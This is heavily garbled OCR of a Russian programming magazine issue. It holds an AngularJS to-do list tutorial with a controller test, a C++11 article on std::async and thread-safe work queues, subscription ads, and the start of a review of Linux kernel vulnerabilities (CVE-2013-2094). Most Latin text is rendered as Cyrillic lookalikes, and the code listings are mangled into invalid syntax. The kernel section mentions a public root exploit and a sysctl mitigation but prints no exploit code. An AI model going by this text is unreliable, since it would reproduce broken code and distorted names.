родитель — компания Соо(]е 


ТЕСТИРОВАНИЕ 

Чем больше тесты покрывают код, тем меньше вероятность 
возникновения нежданчиков. Разработчики Апошаг всеми фи- 
брами и жабрами с таким подходом согласны, поэтому фрейм- 
ворк из коробки дружелюбен к написанию тестов. 


ВЫРАЖЕНИЯ 

Чтобы что-то вывести в содержимое какого-либо объекта, тебе 
не требуется писать в шаблоне громоздкие конструкции в сти- 
ле <$спр{></зспир{> или что-то в этом роде. Достаточно заклю- 
чить выражение в двойные фигурные скобки, и все, данные 
будут обработаны. Например, результатом выполнения кода 
<в1> 2+1 = {{2+1}}</П1> будет «2 + 1 =3». 


ДИРЕКТИВЫ 

Директивы являются одной из ключевых возможностей 
Апацаг. Они позволяют разработчику описать поведение от- 
дельных элементов и расширить синтаксис НТМЕ. В состав 
Апоц!аг входит лишь базовый набор директив. Однако никто 
не мешает нам его расширить своими собственными наработ- 
ками. Правильно созданные директивы могут использоваться 
и в других проектах. Некоторые разработчики даже практику- 
ют выкладывание своих коллекций компонентов в публичный 
доступ. Ярким примером тому служит команда Апоцап\ ( 

), которые выложили и поддерживают в актуальном 
состоянии около двадцати готовых к использованию компо- 
нентов. 

Я неспроста сказал, что директивы — одна из ключевых воз- 
можностей. Начинающие разработчики частенько пропускают 
эту мысль мимо ушей и начинают мудрить по-своему — из- 
меняют напрямую ООМ. Этого делать ни в коем случае нельзя. 
Почему? Во-первых, так гласят священные заповеди Апашаг, 
а во-вторых, разработчик лишается вкусностей вроде много- 
разового использования своих наработок, простого сопрово- 
ждения кода и так далее. 


$СОРЕ, ПРОИЗВОДИТЕЛЬНОСТЬИ МИФЫ 
О производительности Апашаг можно найти много негатив- 
ных отзывов. По некоторым заявлениям, производительность 
фреймворка недостаточно хороша и не годится для серьезных 
приложений. Например, нередко можно встретить примеры, 
авторы которых демонстрируют непригодность фреймворка 
для обработки нескольких десятков тысяч объектов. «Тормозит 
ваш Апоц!агс его продвинутым биндингом!» — кричатярые про- 
тивники. При детальном рассмотрении примеров становится 
очевидно, что проблема надуманна и их авторы не удосужились 
прочитать до конца документацию и вспомогательные материа- 
лы с официального блога. 

Чтобы раз и навсегда развеять мифы о производительности, 
разберемся с таинственной сущностью $соре (область видимо- 


Тест 


Еще тест 


Тодо-листвработе 
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Онанезть зтулью в 1 


сти). Зсоре — это не модель, и не нужно пытаться ее из $соре 
делать. Ничего хорошего из этого не получится. В руководстве 
по АпаШаг четко сказано, что под моделью подразумевается 
любой массив данных, а зсоре может содержать ссылку на мо- 
дель. Не нужно пихать все данные из модели в $соре. Да, в та- 
ком контексте ими удобно манипулировать, но никакой выгоды 
ты не получишь, а только тормоза. Не стоит считать все сказан- 
ное банальным обходным маневром и отмазкой со стороны 
разработчиков Апащаг. Это архитектура Апащаг, и с ней нужно 
считаться. Тем более не стоит забывать о паттерне М\\М. По- 
мимо традиционной сущности «модель», он выделяет «модель- 
представление», и в данном случае $соре — это есть модель- 
представление, а значит, в ней должны быть данные, которые 
требуется отображать. 

Получается, что наезды на производительность Апащаг 
по большей части несправедливы. Во всяком случае, в озву- 
ченных выше примерах. Хорошо, один миф разрушен. Но ведь 
проблемы могут случиться (теоретически) и на более скромных 
объемах. Некоторые разработчики утверждают, что тормоза 
могут проявляться, когда в соре напихано ни много ни мало 
2000—3000 объектов. Как быть с этим аргументом? Частично 
ответ я уже дал — не нужно пихать в $соре то, что не требует- 
ся отображать прямо сейчас. Вот серьезно, я не могу предста- 
вить ни одной задачи, которая может потребовать вывод такого 
большого количества объектов на одной странице. Тут либо за- 
кралась ошибка в архитектуре приложения, либо разработчик 
неправильно трактует решаемую задачу. 

Почему же несколько тысяч элементов могут вызывать се- 
рьезные проблемы с производительностью? Ну ей-богу, в ка- 
ком веке мы живем? Неужели пара тысяч объектов могут стать 
серьезной проблемой для современного ПК? На самом деле 
все несколько сложнее, чем просто большое количество объ- 
ектов. Причина кроется в работе биндинга. Во время компонов- 
ки шаблона директивы создают так называемые наблюдатели 
($масп). Наблюдатели уведомляют директивы об изменении 
свойств, чтобы те, в свою очередь, вовремя обновили значения 
элементов в РОМ. Эта операция производится часто, поэтому 
при большом количестве объектов в $соре тормоза будут неиз- 
бежны. 


ЗАГРУЗКААМСОЕАВ -ПРИЛОЖЕНИЯ 

Начальная загрузка Апацаг-приложения выполняется при по- 

мощи директивы поАрр. Данный способ подходит в большин- 

стве случаев, но при желании можно все сделать ручками. В на- 
шем примере мы пойдем простым путем, то есть воспользуемся 
директивой поАрр, указав ее в корневом элементе страницы. 

После объявления этой директивы произойдет следующее: 

. создастся пеог (механизм, применяемый для получения 
экземпляров объектов, предоставляемых поставщиком, за- 
грузки модулей и так далее), который будет использоваться 
для внедрения зависимостей в пределах приложения; 

. пресюог сформирует глобальный $соре в контексте модели 
нашего приложения; 

. Апоцаг начнет обрабатывать дерево ООМ с элемента, в ко- 
тором была объявлена директива поАрр. Во время этого 


Рисуем прототип буду- 
щего приложения 


Логотип Апоц!а$ 
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процесса будут созданы все найденные биндинги и выпол- 
нены обнаруженные директивы. 


По завершении загрузки начинается самая настоящая 
слежка за всеми биндингами. Если произойдут какие-нибудь 
события (например, банальный клик мышкой или ввод текста), 
то Апа\цаг немедленно обновит представление и биндинги. 


Я долго думал, какой лучше подобрать пример для демонстра- 
ции Апоцаг. Скажу честно, сначала у меня была грандиозная 
идея сотворить матерое расширение для браузера Сооде 
Спготе, способное взаимодействовать с различными сервиса- 
ми корпорации добра. Но, к сожалению, до конца отладить весь 
задуманный функционал у меня не вышло. Что-то постоянно 
не работало и глючило. В итоге я решил рассмотреть классиче- 
ский пример — создание Тобо-листа, а про разработку расши- 
рений для Сооде Спготе когда-нибудь сделаю, с позволения 
редактора рубрики, отдельную статью. 

Для начала сформулируем задачу. Что собой представляет 
типичный Тобо-лист? В первую очередь это список задач, ко- 
торые необходимо выполнить в определенное время. Каждая 
задача — это отдельный элемент, обладающий минимум двумя 
свойствами: наименование (описание задачи) и состояние. 


ПРЕДСТАВЛЕНИЕ 
Часть кода представления я привел в первом листинге, а пол- 
ную версию ты всегда можешь взять с нашего диска. Любое 
Апоцаг-приложение начинается с объявления директивы 
поАрр. Обрати внимание, что в коде название директив пи- 
шется через дефис, а в хелпе и в тексте статьи слитно. Для ди- 
рективы паАрр можно указать дополнительный атрибут — имя 
модуля, который будет загружен при инициализации приложе- 
ния. Пока оставим этот вопрос открытым, а в качестве имени 
модуля укажем {1оот\ус. Далее я привожу описание формы 
с одним-единственным полем. В него пользователь будет вво- 
дить новую задачу, и при нажатии кнопки «Отправить» она будет 
отправляться в общий список. 

Обработать событие отправки данных, введенных в форму, 
поможет директива паЗибтй. Она позволяет забиндить дей- 


При разработке на Апацаг тебе однозначно понадо- 


бится дополнительный инструмент отладки. К сча- 
стью, такой инструмент уже создан и выполнен в виде 
расширения для бооде Спготе. Называется оно 


Апацаг/$ Ватагапд ( ), и после установки 
из @ооде Рау расширение встраивается допол- 
нительной примочкой в Веуеюрег$ Тоо!$. Ваагапа 
позволит тебе просматривать иерархию $соре, их 
содержимое и при желании изменять значения прямо 
из консоли. Более подробную информацию ты смо- 
жешь получить из видео, доступного на странице 
расширения в Сбооде Р!ау. 
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Мы можем объявить контроллер как в теле самой страницы (там, где у нас 


представление), так и в отдельном файле. Второй способ предпочтительней, 
поскольку позволяет отделить логику от представления 


ствие, которое будет выполняться при отправке данных из фор- 
мы. В нашем случае таким действием будет метод контроллера 
аааТоао(). В теле метода будет описан код, добавляющий новую 
задачу в модель. Сам текст задачи будет вводиться в поле ввода, 
для которого я указываю директиву паМосаЕе!|, тем самым устанав- 
ливая двухстороннюю привязку с моделью отображения. 

Теперь взглянем на вывод данных из модели. Каждая но- 
вая задача обрамляется тегом 1, включающим в себя элементы 
управления: изменение состояния, редактирование или уда- 
ление. Функционал этих кнопок реализуется тем же способом, 
что был применен для добавления новых задач. С одним лишь 
отличием — вместо директивы паЗибтй используется паСИск 
(обрабатываем клик по кнопке) или поВЫСИСК (двойной щелчок). 

Поскольку все введенные задачи хранятся в массиве, нам 
нужно организовать его последовательный обход. Для этой 
операции не требуется прибегать к услугам циклов, достаточно 
применить директиву паВереа+. В качестве атрибутов ей следу- 
ет указать коллекцию для обхода и переменную, которая будет 
получать указатель на очередной элемент при каждой итерации. 

Для пущей красоты нам необходимо позаботиться об альтер- 
нативном оформлении выполненных задач. По задумке, ко всем 
завершенным таскам должен применяться стиль «зачеркнуто». 
Эффективно решить эту задачу поможет директива паС!аз$$. 
Она устанавливает класс оформления для определенного НТМИ- 
элемента в зависимости от результата вычисления выражения. 

Последнее, что нуждается в пояснении, — конструкция 
АКег: Зати$ЕЩег. Здесь НКег — встроенная функция, позволяю- 


ЛИСТИНГ 3. ТЕСТ ДЛЯ КОНТРОЛЛЕРА 


Описываем набор тестов для контроллера 


// (они могут быть вложенными) 


// Первый параметр — название группы тестов, а второй -— 
// функция с тестами 
езсг1 Бе ( Кипс1той () {+ 


// Переменные для взаимодействия с контроллером и $соре 
маг сег1, зсоре; 


о выполнения теста загружаем модуль фодотус 


БефогеЕасй ( тоаиТе ( Е 


Инициализируем контролле 
БеРогеЕасй (1п1ес* (РипсЕтТоп сопЕго11ег гоо%5соре) { 


°соре = $гоо%5соре. $пеш() ; 


СЕг1 = $сопго11ег <соре: $соре}); 


а О ие ИЗРЕЧЕНИЕ НА 


// Определяем новый тест посредством функции 1+. 
// Ехсерф позволяет определить ожидания, которые будут 
// проверяться в тесте 
1% ( Д И ее Ко 
ехресе (зсоре.ед1тедТодо).+оВеми11(); 
У, ВВК ль ЗВ НЫЙ 


(| Д Д а енеа оО 
ехрес* (зсоре.фо4о$.]1епёП).фоВе(_); 
$; 


щая отфильтровать данные из массива {090$, соответствующие 
значению переменной Заи$ЕЁег (ее значение будет изменять- 
ся в контроллере). 


КОНТРОЛЛЕР 

Во втором листинге я привел описание контроллера — клю- 
чевой части нашего примера. Контроллер в Апдщаг оформля- 
ется в виде обычной уауа5сир\-функции. Например: Типсйоп 
МуСощтойег (). 

Мы можем объявить контроллер как в теле самой страницы 
(там, где у нас представление), так и в отдельном файле. Вто- 
рой способ предпочтительней, поскольку позволяет отделить 
логику от представления (вспоминаем теорию паттерна М\С) 
и упростить поддержку приложения в будущем. 

Правда, при вынесении контроллера в отдельный файл мы 
должны как-то сообщить Апацщаг, что в контексте нашего при- 
ложения необходимо использовать именно этот контроллер. 
Решением этого вопроса занимается директива пдАрр. В ка- 
честве дополнительного атрибута она принимает имя моду- 
ля, который будет загружен при инициализации приложения. 
Под модулем в Апащаг подразумевается совокупность служб, 
директив, фильтров и различной вспомогательной информа- 
ции, которая может быть использована для конфигурирования 
песог. Для нашего примера в качестве модуля я указываю 
{одогтус, а его создание описываю в файле арр.]|з: 


тодот\ус = апёиу1аг.тоди1е ( 'фодотус', []); 


После этого в рамках данного модуля можно описать наш 
контроллер, что яи делаю конструкцией: 


тоЧотус . сопго11ег( 'ТодоСег1 ', — 
ТодоС*г1($зсоре, $1оса*1оп, фо4о5$фогаве) 


Давай разберем ее на кусочки: 

. юЧотм\ус — имя модуля (вспоминаем про директиву паАрр 
и файл арр.]|5); 

. сопто|ег — служба, отвечающая за создание экземпляра 
контроллера. В качестве параметров мы должны передать 
название функции с контроллером и ссылку на объект, со- 
ответствующий контроллеру. Обрати внимание, как я пере- 
даю ссылку на объект контроллера. Поскольку отдельной 
функции контроллера у нас нет, то я ее определяю прямо 
в параметре; 

. ЮпсНоп ТоаоСИ($5соре, Фосаноп, фо4оЗ{югаде) — функция, 
определяющая контроллер. В качестве параметров переда- 
ем: 

. $зсоре. Область видимости, созданная при объявлении ди- 
рективы паСотго!ег; 

. Фосаноп. Служба, предназначенная для работы с ЧРИ, вве- 
денным в адресной строке браузера; 

. фюдоЗюгаде. Самописная служба, созданная для взаимо- 
действия с локальным хранилищем. 


А теперь самое интересное: ни один из этих параметров 
(для функции контроллера), кроме $соре, не является обя- 
зательным. Все остальное добро мы передаем на свое усмо- 
трение и сугубо для решения конкретной задачи. Количество 
параметров и их тип для функций-контроллеров может быть 
любым. 

С объявлением контроллера разобрались. Теперь посмо- 
трим на его внутренности. В самой первой строчке я объявляю 
модель (1040$), которая представляет собой обычный массив. 
В нем будут храниться все добавленные пользователем задачи. 
Чтобы получить список задач, который отображен в представ- 
лении в настоящее время, достаточно обратиться к свойству 
{040$ в $соре. Однако нас должны интересовать не только те- 
кущие данные, но и ранее сохраненные в локальном хранили- 
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ще, которые мы можем получить через описанную мной службу 
{оаоЗюогаде. После этих манипуляций в модели будут абсолют- 
но все данные. 

Сформировав модель, я регистрирую функцию обратного 
вызова, которая будет срабатывать при изменении содержи- 
мого нашей модели. В Апдцаг этот механизм выполняется 
при помощи метода $ма{сН. В качестве параметров ему нужно 
передать: 

. значение, за которым требуется наблюдать; 

. функцию, которая вызывается при изменении значения, 
переданного в качестве первого параметра; 

. признак необходимости сравнивать объект. 


В теле функции, которая будет вызываться при изменении со- 
держимого модели, я определяю всего лишь один метод — 
{одоЗогаде.рщ(ю9о0$). Он отвечает за сохранение списка за- 
дач в локальное хранилище. 

Чуть ниже по тексту второго листинга ты можешь увидеть по- 
хожий трюк. Только на этот раз следить нужно за изменением 
адресной строки. Появление параметра ас\\е означает необ- 
ходимость установки фильтра, отображающего пользователю 
только невыполненные задачи. Ну а если в УВЕ присутствует 
параметр сотрЩечд, то делаем обратную операцию — невы- 
полненные задачи скрываем, а завершенные отображаем. 

После всех вспомогательных манипуляций, направленных 
на сохранение и фильтрацию данных, я описываю функции 
для взаимодействия с моделью: добавление, редактирование 
и удаление задач. Этот код вряд ли требует дополнительных по- 
яснений. 


ТЕСТИРУЕМ 


Написание тестов — неотъемлемая часть разработки прило- 
жения с использованием Апацщаг. Для написания и выполнения 
тестов есть все необходимое из коробки, и сейчас ты в этом 
убедишься на реальном примере. Я не буду заходить далеко, 
а просто приведу часть кода, тестирующего контроллер с не- 
обходимыми для понимания комментариями, — смотри врезку 
слева. Все подробности ты узнаешь из документации. 


ВМЕСТО ЗАКЛЮЧЕНИЯ 


Однозначно, Апацаг/$ получился качественным и интересным 
решением, которое стоит применять в своих проектах. Ком- 
пания Сооде вновь смогла удивить нас релизом хорошо про- 
думанного продукта. Нельзя сказать, что он получился идеаль- 
ным, но с возложенными на него задачами ему справиться под 
силу, а это самое главное. На этом спешу откланяться и поже- 
лать тебе взглянуть на мир /$-разработки иначе. 2= 
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Официальный сайт 
проекта Апду!аг 


КАК ИЗУЧАТЬ АМСИТАВ]$ 


Официальная документация (чоо.а/и УВ). Надее 
составлением потрудились хорошо, и для первого 
легкого заплыва ее будет более чем достаточно. 
Бесплатный видеокурс от едапеаа (\млл/м.едопеаа.10). 
На момент написания статьи это был, пожалуй, са- 
мый большой видеокурс по применению Апоцаг/5. 
Автор освещает темы биндинга, применения 
контроллеров/фильтров, тестирования и многое 
другое. Все насчитывается 42 видеоурока. 
Вводные уроки на Соае Зспоо! (а0о.да/УХВОСА). 
Несмотря на большое количество видеоуроков 

по различным кодерским дисциплинам, Апацаг/$ 
затронут слабенько. Всего два видео, но посмо- 
треть их однозначно стоит. 

ММК! на проекте 40с$.апашаиз.ги (д00.9/20!СВ). 
Проект стартовал в конце апреля этого года и на- 
целен на коллективный перевод официальной до- 
кументации. Пока у ребят нет полноценного сайта, 
поэтому готовые части перевода они выкладывают 
на ммК! популярного хостинга проектов СОЁНиь. 

На момент написания этих строк процент пере- 
веденного материала достиг отметки 22%. Вполне 
возможно, что к выходу журнала перевод докумен- 
тации будет готов. 

Статья «Практикум Апацагк/$ — разработка админи- 
стративной панели», опубликованная на Хабре 
(900.аИВЕЗУА, аоо.а/еЗрвВК). 


Официальный твиттер-аккаунт (чоо.аИ/ИТУЕМО). 
Здесь всегда можно узнать последние новости 


и найти ссылки на свежие мануалы. 
Отличная статья о моделях в Апаоцаг]$ 


(ч00.9/\/002С). 


БРАТЬЯ ПО ДУХУ 


ЕКО: (доо.0/КТ5а\/) — новый проект от команды 
Тмм(ег. Предыдущий их проект (ТмлЦег Воо$ар) 
до сих пор почивает на лаврах, и, судя по всему, 
РОМ рано или поздно к нему присоединится. Тем 
более что полюбить его есть за что: компонентный 
подход, не требует выбора определенного подхода 
для отображения данных, в основе лежит собы- 
тийная модель (для связи между компонентами), 
поддержка функциональных примесей и другие 
полезные плюшки. 

ВаскКБопе (Баскропе]5.ога) — фреймворк заинте- 
ресует заядлых любителей Оиегу, которые устали 
разгребать тонны неструктурированного /$-кода. 
Васкбопе поможет навести порядок и разгрузить 
искусственно усложненные решения. 

Сапт4$ (сап|5.сот) — один из самых легковесных 
и простых /$5-фреймворков, призванных упро- 
стить разработку веб-приложений. Из коробки 
Сап/$ прекрасно уживается с популярными /$- 
библиотеками |Оичегу, Герою, Мосю!$, \Уш, Оо]. 
Етбег (ет бе!5.сот) — М\УС-фреймворк с низ- 
ким порогом вхождения. Возможности бедней, 
чем у ВаскБопе, но и разобраться новичкам с ним 
значительно проще. Из главных преимуществ сто- 
ит выделить наличие функционала, упрощающего 
рутинные операции. Для многих вещей кода писать 
требуется меньше, чем, скажем, для Васкропе. 
КпоскКоиЫ$ (кКпоскои15.сот) — пропагандирует 
модель М\\/М, хвастается шикарной реализацией 
биндингов, хорошей производительностью и не- 
требовательностью к сторонним библиотекам. 
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ПРАВИЛЬНАЯ 
МНОГОПОТОЧНОСТЬ 


«Да» — плавности, «нет» — блокировкам! 


Известно, что приложения бывают однопоточные и многопоточные. Этае 1йгеаа софт кодить 
легко и приятно: разработчику не надо задумываться о синхронизации доступа, блокировках, 
взаимодействии между нитями и так далее. В многопоточной среде все эти проблемы часто 
становятся кошмаром для программиста, особенно если опыта работы с тредами у него еще 
не было. Чтобы облегчить себе жизнь в будущем и сделать ти{{Игеа приложение надежным 
и производительным, нужно заранее продумать, как будет устроена работа с потоками. Эта 
статья поможет твоему мозгу увидеть правильное направление! 


Оееоп!$ 
дееоп!з@дтай.сот 


ГНИИ 


ИННИИИИ]\ 
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синхронное программирование набирает оборо- 
ты. Пользователи любят, когда софт выполняет все 
действия практически моментально, а Ш работает 
плавно и без лагов. Как бы ни росла производитель- 
ность железа, но соответствовать таким высоким 
требованиям можно только с помощью тредов и асинхронно- 
сти, а это, в свою очередь, создает множество мелких и не очень 
проблем, которые придется решать обычным программистам. 

Для того чтобы понять, что за подводные камни таит в себе 
работа в многопоточной среде, нужно взглянуть на следующий 
КОД: 


5$1121е{Игеа код 
ти Роо() 


{ 


11% гез; 
// Что-то долго делаем и возвращаем результат 
гефгип гез; 


} 


//_В основном потоке вызываем Еоо 
ачфо х = Еоо(); 


Е. 


У нас есть функция Роо, которая выполняет некоторые дей- 
ствия и возвращает результат. В главном потоке программы мы 
запускаем ее, получаем результат работы и идем делать даль- 
ше свои дела. Все хорошо, за исключением того, что выполне- 
ние Роо занимает довольно длительное время иее вызов в @Ц]|- 
потоке приведет к замерзанию всего интерфейса. 

Это плохо, очень плохо. Современный юзер такого не пере- 
живет. Поэтому мы, немного подумав, решаем вынести дей- 
ствия, выполняемые в нашей функции, в отдельный поток. ОИ 
не залипнет, а у Гоо появится возможность спокойно отрабо- 
тать в своем треде. 


АСИНХРОННЫЙ ВЫЗОВ ФУНКЦИИ 

С выходом С++11 жить стало проще. Теперь для создания сво- 
его треда не надо использовать сложные АР! Майкрософт или 
вызывать устаревшую _Бедийгеаа. В новом стандарте появи- 
лась нативная поддержка работы с потоками. В частности, сей- 
час нас интересует класс За: {Пгеаа, который является не чем 
иным, как ЭТЁЕ представлением потоков. Работать с ним — одно 
удовольствие, для запуска своего кода достаточно лишь пере- 
дать его в конструктор $а:{йгеаа в виде функционального объ- 
екта, и можно наслаждаться результатом. 

Стоит также отметить, что мы можем дождаться, когда по- 
ток закончит свою работу. Для этого нам пригодится метод 
{Пгеаа: от, который как раз и служит для этих целей. А можно 
и вовсе не дожидаться, сделав {Пгеаа: :ащасй. Наш предыдущий 
однопоточный пример может быть преобразован в ти {Игеаа 
всего лишь добавлением одной строки кода. 


Многопоточность с помощью $*4: : Игеаа 


ЕЕ 
аифо {ИгеаЯ = $4: : ЕИгеаа(Роо); 
// РЕоо выполняется в отдельном потоке 


ЕР 


Казалось бы, все хорошо. Мы запустили Гоо в отдельном по- 
токе, и, пока она отрабатывает, мы спокойно занимаемся сво- 
ими делами, не заставляя основной поток ждать завершения 
длительной операции. Но есть одно но. Мы забыли, что Роо воз- 
вращает некий результат, который, как ни странно, нам нужен. 
Самые смелые могут попробовать сохранять результат в какую- 
нибудь глобальную переменную, но это не наш метод — слиш- 
ком непрофессионально. 

Специально для таких случаев в ЗТЁЕ есть замечательные 
${::азупс и 5: АЩиге — шаблонная функция и класс, которые 
позволяют запустить код асинхронно и получить по запросу 
результат его работы. Если переписать предыдущий пример 
с использованием новых примитивов, то мы получим прибли- 
зительно следующее: 


Пробуем $14: :азупс и $*а: : и иге 
В 


Пример использования 
ЗА: {Игеаа 


777 


$Еа: : Рибиге<1пЕ> + 
азупс, Еоо); 
// Работаем дальше в основном потоке 


$4: : азупс ($4: : 1аипсН: : 


// Когда нам нужно, получаем результат работы Еоо 
ачфо х = +.Рет(); 


В $14::азупс мы передали флаг За:аипсП::азупс, который 
означает, что код надо запустить в отдельном потоке, а также 
нашу функцию Роо. В результате мы получаем объект $1: :Ащиге. 
После чего мы опять продолжаем заниматься своими делами и, 
когда нам это понадобится, обращаемся за результатом выпол- 
нения Роо к переменной Т, вызывая метод 1щиге::д Е. 

Выглядит все идеально, но опытный программист наверняка 
задаст вопрос: «А что будет, если на момент вызова А\иге::9е1 
функция Гоо еще не успеет вернуть результат своих действий?» 
А будет то, что главный поток остановится на вызове СЕТ до тех 
пор, пока асинхронный код не завершится. 

Таким образом, при использовании $14: :АКиге главный по- 
ток может заблокироваться, а может и нет. В итоге мы получим 
нерегулярные лаги нашего СЧ. Наша цель — полностью из- 
бежать таких блокировок и добиться того, чтобы главный тред 
работал быстро и без фризов. 


СОМСОВВЕМТОЦЕОЦЕ 

В примере с Ищиге::дет мы фактически использовали мью- 
текс. Во время попытки получения значения из $: :Аиге код 
шаблонного класса проверял, закончил ли свою работу поток, 
запущенный с помощью ${4::азупс, и если нет, то ожидал его 
завершения. Для того чтобы один поток никогда не ждал, пока 
отработает другой, умные программисты придумали потокобе- 
зопасную очередь. 

Любой кодер знает такие структуры данных, как вектор, мас- 
сив, стек и так далее. Очередь — это одна из разновидностей 
контейнеров, работающая по принципу НРО (Риз ш Еиз{ Оц®. 
Тргеаа-зае очередь отличается от обычной тем, что добавлять 
и удалять элементы можно из разных потоков и при этом не бо- 
яться, что мы одновременно попробуем записать или удалить 
что-нибудь из очереди, тем самым с болышой долей вероятно- 
сти получив падение программы или, что еще хуже, неопреде- 
ленное поведение. 

Сопсштет ацеие можно использовать для безопасного вы- 
полнения кода в отдельном потоке. Выглядит это примерно так: 
в потокобезопасную очередь мы кладем функциональный объ- 
ект, а в это время в рабочем потоке крутится бесконечный цикл, 
который на каждой итерации обращается к очереди, достает 


изнее переданный ей код и выполняет его. Чтобы лучше понять, 
можно взглянуть на код: 


Реализация потокобезопасной очереди команд 
с1аз5 МогкОцеие 
4 
РЫБЕ 

фуреде{ 5+4: : ФипсЕ1оп<\уо14 (у01а)> Са11Т%ет; 


МогкОчеце() : 

допе (Та15е), 

ЕИгеад( [=] () 
{ 


имй11е (!4опе) 
о 


{ 
| 


\о1а РизИВаск (Са11Тет могКкТет) 
{ 


} 


ачече.ри$И (могКТфет) ; 


ре1уа*е: 
сопсиггеп{ _ацеие<Са11Т%ет> диеце; 
боо1 аопе; 
54: :{Игеа4 +Пгеад; 


}; 


Теперь наш код выполняется в очереди, в другом потоке. 
Более того, мы можем отправить на выполнение не только Роо, 
но и другие функции, которые выполняются слишком долго. 
При этом мы не будем каждый раз создавать отдельный Йгеаа 
для каждой функции. 

Но мы опять забыли про возвращаемое значение. Одним 
из способов решения этой проблемы будет обратный вызов. 
Мы должны передавать в рабочую очередь не только код, тре- 
бующий выполнения, но и са!баск-функцию, которая будет вы- 
звана вычисленным значением в качестве параметра. 


Са1]1Баск для возврата значения 
с1аз5 МогкОиеие 
4 
рыБтте: 
Туреде+ $*%а: :Фипс1оп<1п(м01а)> могкТТфет; 
Туреае+ $*а: : Фипс1оп<\019(1п*)> Са11БасктТ%ет; 


МогкОцеице . 


Везий - Очеие 


М/огк - Оцчеие 
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$9; Коба 


53: Кибиге 


++ 


Те Овал пре 319 


Туту рголидез а песали го эссе % 7 ге К ОГ азупсРесло 


» Ал зву РМсеюл ореыюл 16: 


к 
чо( 


оррозес © 


$0 чыегу, ак ©е. © 
ог} Маз ПОС уфе рис 
ево й 3 гФобу 50 4099 в 
о ас: вы т 


Колы ге ителессея зРагод $06 Так го 


Метьег бис Чопв 


соожелоса 3 Клио обес 
дезоихту Се Клео Бет 
ое Ре Зе обес 


злу Ре уд име бот юз 


беиыю 1 тезий 


Документация 
шаблонного класса 
За: Театиге 


Ещеодин вариант 
использования 
сопсштептачеие 


песцитм ре тек 


опе(Фа15е), 
Еигеаа ( [=] () 


{ 


ий11е (!аопе) 
диече.рор()(); 
Ви: ЗЕНА, ине. 
{ 
} 


\о1а РизНВаск (мМогкТЕет могКкТЕет, Са1]БаскТ%ет 
са11Баск) 


{ 
ачече .риз$В ([=]() 
{ 
анифо гез = могкТ*ет(); 
са1]Баск(гез); 
}); 
} 
ре1уате: 


фуреде{ 5+4: :ФипсЕ1оп<\уо14(у\01а)> Са11Т%ет; 


сопсиггеп* _ацеие<Са11Т%ет> диеце; 
боо1 аопе; 
$4: : ЕПгеаа +пгеаа; 


в 


Но тут следует помнить, что обратный вызов будет сделан 
в рабочем потоке, а не в клиентском, поэтому заранее следу- 
ет позаботиться о безопасной передаче значения. Если все 
приложение построено на основе архитектуры потокобезо- 
пасных очередей, то есть у каждого объекта есть своя очередь 
команд, то решение данной проблемы становится очевид- 
ным — мы просто будем поручать выполнение обратного вы- 
зова очереди, в которой работает объект, запросивший у нас 
выполнение Роо. 

На словах это звучит довольно просто, но на практике при- 
дется решать множество проблем, которые так или иначе свя- 
заны с многопоточностью. Так как все происходит асинхронно, 
то вполне может быть, что по окончании выполнения какого-ли- 
бо кода объект, запросивший это выполнение, уже не будет су- 
ществовать и, возвращая ему значение вычислений, мы можем 
сломать всю программу. Такие нюансы надо учитывать с самого 
начала, чтобы на этапе проектирования исключить все подоб- 
ные ситуации. 


ЗАКЛЮЧЕНИЕ 

Асинхронное программирование нынче в тренде. Пользова- 
тельские интерфейсы 10$ и ММпаом/5 Рпопе работают плавно 
и без лагов как раз из-за того, что в их основу заложены прин- 
ципы, позволяющие избегать блокировок потоков в ожидании 
результатов работы тех или иных длительных действий. И чем 
дальше, тем более ярко будет выражено движение в сторону 
асинхронности работы ПО. 2= 


ПОДПИШИСЬ! 


8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 


Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 
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Сова Сана 
Независмаяьно ВРС 
ДЭВИД КЕЙДЖ- 


6 номеров — 1194 руб. 
12 номеров — 2149 руб. 


6 номеров — 564 руб. 
13 номеров — 1105 руб. 


» НЕТРУЧЕК — 
_ НЕТВАРЕНЬЯ. 


6 номеров — 1110 руб. 
12 номеров — 1999 руб. 


6 номеров — 599 руб. 


12 номеров — 1188 руб. 


Зномера — 630 руб. 
6 номеров — 1140 руб. 


ы 


6 номеров — 810 руб. 
12 номеров — 1499 руб. 


6 номеров — 895 руб. 


12 номеров — 1699 руб. 
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6 номеров — 1110 руб. 
12 номеров — 1999 руб. 


6 номеров — 1110 руб. 
12 номеров — 1999 руб. 
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6 номеров — 690 руб. 
12 номеров — 1249 руб. 


дате)Тапа 


5Пор.дс.ги 


БО ЖКА( 


6 номеров — 1110 руб. 
12 номеров — 1999 руб. 


И Е 
18 СОНЯ И МАРК УАИТСНОУ: 0 
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6 номеров — 810 руб. 
12 номеров — 1499 руб. 


' ВСЕ О ХОККЕНХАЙМЕ | ии) 


гонынг = 


автомабилен Ее 


6 номеров — 775 руб. 
12 номеров — 1399 руб. 


Отихога 
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ОБЗОР САМЫХ ОПАСНЫХ, 
НЕОДНОЗНАЧНЫХ И ДУРАЦКИХ 
УЯЗВИМОСТЕИ В ЯДРЕ ИМОХ 


14 мая этого года в ядре Ипих была обнаружена 
серьезная локальная 0-Чау-уязвимость 
(С\МЕ-2013-2094), затрагивающая практически все 
версии ядер, выпущенные за последние три года. 
Это довольно серьезный удар по репутации Шпих, 

а также админов, серверы которых были взломаны. 
Является ли этот случай исключением из правил 

и как часто на самом деле в Ипих находят серьезные 
проблемы безопасности? 


С\УЕ-2013-2094 
Данная уязвимость была выявлена в ядрах с 2.6.37 по 3.8.8 и, 
по сути, распространялась на все актуальные версии дистрибути- 
вов и даже на ВНЕЁЕ би СетО5 6, которые хоть и основаны на ядре 
2.6.32, но включают в себя бэкпортированную функциональность 
из более поздних ядер. Проблемный участок был найден в коде 
подсистемы РЕВЕ_Е\/ЕМТ$, предназначенной для трассировки, 
но активированной в большинстве дистрибутивов. 

Вместе с известием об ошибке был опубликован и рабочий 


эксплойт (чо0о.а/та/), однако сама ошибка была исправлена ы 
еще в апреле вместе с выпуском ядра версии 3.8.9, без разгла- Евгений Зобнин 
шения информации об уязвимости. ехесой.ги 


Стоит отметить, что доступный сплоит не сработает, если 
значение параметра Кете!.ре! еует рагапо механизма 
зу$сй равно двум. 


# зу5сЕТ -м Кегпе1.рег+_еуеп*_рагапо1а=2 


Однако эта команда не решает проблему в принципе. Не- 
много модифицировав исходный код сплоита, можно получить 
гоот даже при Кете!.ре! емеп{ рагапою=2. 


